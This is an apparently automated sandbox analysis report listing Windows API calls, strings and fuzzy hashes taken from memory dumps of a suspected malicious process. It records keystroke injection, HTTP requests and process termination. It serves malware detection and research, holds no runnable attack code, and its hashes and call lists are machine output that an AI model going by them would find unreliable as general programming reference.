                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac83a5322b9a916c32e00129a4cb1807214b2d184a75422651734d52a6774ba4
                                                                                                                                                                                                                                                                                                    • Instruction ID: b72b5e76c3ccde3edcbe6bd91a857e717afbcba5b21af072b0bc859bea19cb38
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac83a5322b9a916c32e00129a4cb1807214b2d184a75422651734d52a6774ba4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66616AB5A00208AFDB10DFA8CC81EEE77F8EB49714F104159FA14B72E2D774AA45DB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E8BB18
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB2C
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00E8BB33
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB42
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8BB54
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB6D
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB7F
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BBC4
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BBD9
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BBE4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0073a8c1db36c574e274d5b26c3deb7d5f7284b1add46c550e8641e3f8e90ecb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 85903e1f4fcfe158c2ef8273ab1545899d094a0beff387e29c69ab73327cb330
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0073a8c1db36c574e274d5b26c3deb7d5f7284b1add46c550e8641e3f8e90ecb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA31C1B1908604AFDB10AB56DC84FBB3BA9EB84316F104115FA0DF71E4EB74A948CB25
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E22AF9
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00E22B98
                                                                                                                                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00E22D7D
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00E63A1B
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00E63A80
                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E63AAD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E989F2
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98A06
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00E98A30
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E98A4A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98A5C
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98AA5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E98AF5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00EB8992
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00EB899E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EB8A79
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00EB8AAC
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00EB8AE4
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00EB8B06
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EB8B1E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 4072528602-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00E274D7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27567: GetClientRect.USER32(?,?), ref: 00E2758D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27567: GetWindowRect.USER32(?,?), ref: 00E275CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27567: ScreenToClient.USER32(?,?), ref: 00E275F6
                                                                                                                                                                                                                                                                                                    • GetDC.USER32 ref: 00E66083
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E66096
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E660A4
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E660B9
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00E660C1
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E66152
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                                                    • API String ID: 4009187628-3372436214
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E9CCB7
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E9CCDF
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E9CD0F
• GetLastError.KERNEL32 ref: 00E9CD67
• SetEvent.KERNEL32(?), ref: 00E9CD7B
• InternetCloseHandle.WININET(00000000), ref: 00E9CD86
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E655AE,?,?,Bad directive syntax error,00EBDCD0,00000000,00000010,?,?), ref: 00E8A236
• LoadStringW.USER32(00000000,?,00E655AE,?), ref: 00E8A23D
  • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E8A301
Strings
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
APIs
• GetParent.USER32 ref: 00E829F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00E82A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E82A9A
Strings
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
APIs
• GetClientRect.USER32(?,?), ref: 00E2758D
• GetWindowRect.USER32(?,?), ref: 00E275CE
• ScreenToClient.USER32(?,?), ref: 00E275F6
• GetClientRect.USER32(?,?), ref: 00E2773A
• GetWindowRect.USER32(?,?), ref: 00E2775B
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fb22519f53e2e02a88b83514e729d2f3deaf73e7140e927cbc9b547baf63d04d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4a4bb7c1af8c4754b0bbf56c5e9596ad92228f52da7621f75ee9f566205746ea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb22519f53e2e02a88b83514e729d2f3deaf73e7140e927cbc9b547baf63d04d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6C18B3891465AEFDB10CFA8D940BEEBBF1FF08314F14A41AE899B3250D734A940DB60
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: a54f89727abc9722392ebf9dabc026fb9cb032443d8de94d176d0c17c34b2cfd
• Instruction ID: 4c33442bb5e79a0a77051aaf82962f6eee3162a9df0875ef8136f62572bbffd2
• Opcode Fuzzy Hash: a54f89727abc9722392ebf9dabc026fb9cb032443d8de94d176d0c17c34b2cfd
• Instruction Fuzzy Hash: E0613571909304AFDB31AF79DC816AE7BE49F42326F042DADED04B7291D63299488791
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EB5C24
• ShowWindow.USER32(?,00000000), ref: 00EB5C65
• ShowWindow.USER32(?,00000005,?,00000000), ref: 00EB5C6B
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EB5C6F
  • Part of subcall function 00EB79F2: DeleteObject.GDI32(00000000), ref: 00EB7A1E
• GetWindowLongW.USER32(?,000000F0), ref: 00EB5CAB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB5CB8
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EB5CEB
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EB5D25
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EB5D34
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
• Opcode ID: 271392565e4e44a8290daaa124a1bd868bd004ec9dd9378e4458d3777bb56d8e
• Instruction ID: a1dcf4a40463ba9bb56b26b78480a7fe4ff67cad6e466318480789b200700617
• Opcode Fuzzy Hash: 271392565e4e44a8290daaa124a1bd868bd004ec9dd9378e4458d3777bb56d8e
• Instruction Fuzzy Hash: 5C51C132640B19BFEF249F25CC4ABDB7BA2EB04354F146212F664BA1E0C771A980DF41
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E9CBC7
• GetLastError.KERNEL32 ref: 00E9CBDA
• SetEvent.KERNEL32(?), ref: 00E9CBEE
  • Part of subcall function 00E9CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E9CCB7
  • Part of subcall function 00E9CC98: GetLastError.KERNEL32 ref: 00E9CD67
  • Part of subcall function 00E9CC98: SetEvent.KERNEL32(?), ref: 00E9CD7B
  • Part of subcall function 00E9CC98: InternetCloseHandle.WININET(00000000), ref: 00E9CD86
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: 6cec9be1e57902f26d07cd7507a1a997e30582fbc5a6dab794472b31ebca68b1
• Instruction ID: ba6274b99fc956db44c27265df8c7a90e4d88c6e10ebb1bcc6d39c9797a3adc5
• Opcode Fuzzy Hash: 6cec9be1e57902f26d07cd7507a1a997e30582fbc5a6dab794472b31ebca68b1
• Instruction Fuzzy Hash: B1316D71504705AFDF21AF61CD44AABBBE8FF08304B24552DF95AA2610DB31E814EB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E843AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetCurrentThreadId.KERNEL32 ref: 00E843B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E82F00), ref: 00E843BB
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E82F0A
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E82F28
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E82F2C
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E82F36
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E82F4E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E82F52
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E82F5C
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E82F70
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E82F74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4c089e6f7163e161b1ab069cc6048bae65005f3ed5f51edcc38eac56e1ce4700
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5360eb2d1c25f3bf43c45cebcba33871fb5abdcec4761af7c90a9266d3bd4d01
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c089e6f7163e161b1ab069cc6048bae65005f3ed5f51edcc38eac56e1ce4700
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F01D8707882107FFB1077699C8AF5A3F99DB4DB11F100015F31CBE1E4C9E15444CAA9
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E81D95,?,?,00000000), ref: 00E82159
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00E81D95,?,?,00000000), ref: 00E82160
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E81D95,?,?,00000000), ref: 00E82175
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00E81D95,?,?,00000000), ref: 00E8217D
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00E81D95,?,?,00000000), ref: 00E82180
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E81D95,?,?,00000000), ref: 00E82190
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00E81D95,00000000,?,00E81D95,?,?,00000000), ref: 00E82198
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00E81D95,?,?,00000000), ref: 00E8219B
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00E821C1,00000000,00000000,00000000), ref: 00E821B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7da43178d156d34c1c6d0240f360c01b3c10f9e7bd6ab4888e23e07cd5df301
                                                                                                                                                                                                                                                                                                    • Instruction ID: cc701af99071edd4ac7d2fd68cb0339325e179b70720ae7b2b08a5e03ca3603d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7da43178d156d34c1c6d0240f360c01b3c10f9e7bd6ab4888e23e07cd5df301
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101CDB5245304BFE710AFAADC4DF6B7BACEB88711F004511FA05EB1A1DA709804CB30
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E8CF99
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8CFE0
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E8D047
                                                                                                                                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E8D075
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                    • String ID: ,*$0$<*
                                                                                                                                                                                                                                                                                                    • API String ID: 1227352736-815946194
                                                                                                                                                                                                                                                                                                    • Opcode ID: 742ec4132002d3e9a7c73412e28e5dcabdebf275f2d42eea27ac474f45cf5e29
                                                                                                                                                                                                                                                                                                    • Instruction ID: 705b5902fbc8548621e9de1c4829093811e38128de059c43d5c51aa807d9c316
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 742ec4132002d3e9a7c73412e28e5dcabdebf275f2d42eea27ac474f45cf5e29
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E51DF716093009BE714BF24DC45BABB7E9AB85318F042A2DFA9DF32D1DBB0C9058752
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E8DDAC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E8DDBA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DD87: CloseHandle.KERNEL32(00000000), ref: 00E8DE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EAABCA
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EAABDD
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EAAC10
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EAACC5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00EAACD0
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EAAD21
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
